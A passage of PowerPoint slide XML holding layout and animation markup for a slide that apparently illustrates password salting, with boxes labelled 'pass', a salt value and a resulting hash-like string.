                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr i="0" sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="2200"/>
              <a:t>Salt = “john”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1166" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4251395" y="3379893"/>
            <a:ext cx="1634632" cy="541867"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1164" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1165" name="pass"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="481920" y="34459"/>
              <a:ext cx="670791"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>pass</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1169" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4258168" y="6265333"/>
            <a:ext cx="1634632" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1167" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1168" name="pass"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="481920" y="34459"/>
              <a:ext cx="670791"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>pass</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1172" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9690382" y="4285262"/>
            <a:ext cx="1634632" cy="541867"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1170" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1171" name="3k,f93F3fs"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="162312" y="34459"/>
              <a:ext cx="1310008"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3k,f93F3fs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1175" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9685866" y="7127804"/>
            <a:ext cx="1634633" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1173" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1174" name="3k,f93F3fs"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="162312" y="34459"/>
              <a:ext cx="1310008" cy="472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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3k,f93F3fs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1180" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10629617" y="8606649"/>
            <a:ext cx="1300481" cy="605085"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1300480" cy="605084"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1176" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1300481" cy="605085"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="16200000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="2700000">
                <a:srgbClr val="969696"/>
              </a:outerShdw>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1179" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="173397" y="129660"/>
              <a:ext cx="433494" cy="345764"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="433493" cy="345762"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1177" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="433494" cy="345763"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="99CCFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="666699"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>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sp>
            <p:nvSpPr>
              <p:cNvPr id="1178" name="Shape"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="106567" y="48622"/>
                <a:ext cx="251066" cy="2395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4550" y="8475"/>
                      <a:pt x="0" y="21600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10800" y="16200"/>
                      <a:pt x="21600" y="10800"/>
                      <a:pt x="21600" y="10800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="FFCC66"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="FFFFCC"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="8100000" scaled="0"/>
              </a:gradFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="666699"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="l" defTabSz="1300480">
                  <a:lnSpc>
                    <a:spcPct val="90000"/>
                  </a:lnSpc>
                  <a:spcBef>
                    <a:spcPts val="1300"/>
                  </a:spcBef>
                  <a:defRPr b="1" sz="2800">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1183" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11322755" y="8735341"/>
            <a:ext cx="433494" cy="347699"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="433493" cy="347697"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1181" name="Oval"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="433494" cy="347698"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="99CCFF"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="666699"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1182" name="Square"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="131854" y="88735"/>
              <a:ext cx="171592" cy="173850"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="FFCC66"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFCC"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="8100000" scaled="0"/>
            </a:gradFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="666699"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="25400" dir="8100000">
                <a:srgbClr val="000000"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="1200"/>
                </a:spcBef>
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>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149"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1149"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="8" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1166"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1166"/>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Class="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1141"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1141"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="17" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="18" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1140"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetClass="entr" nodeType="afterEffect" presetSubtype="8" presetID="22" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1148"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1148"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1172"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1172"/>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8" presetID="22" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1157"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1157"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="8" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1169"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
